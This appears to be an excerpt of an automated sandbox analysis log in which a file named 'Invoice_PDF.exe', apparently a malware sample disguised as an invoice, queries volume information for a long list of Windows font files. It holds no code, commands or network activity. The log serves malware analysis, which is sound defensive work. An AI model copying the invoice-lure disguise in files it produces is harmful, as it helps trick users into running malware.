Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Invoice_PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
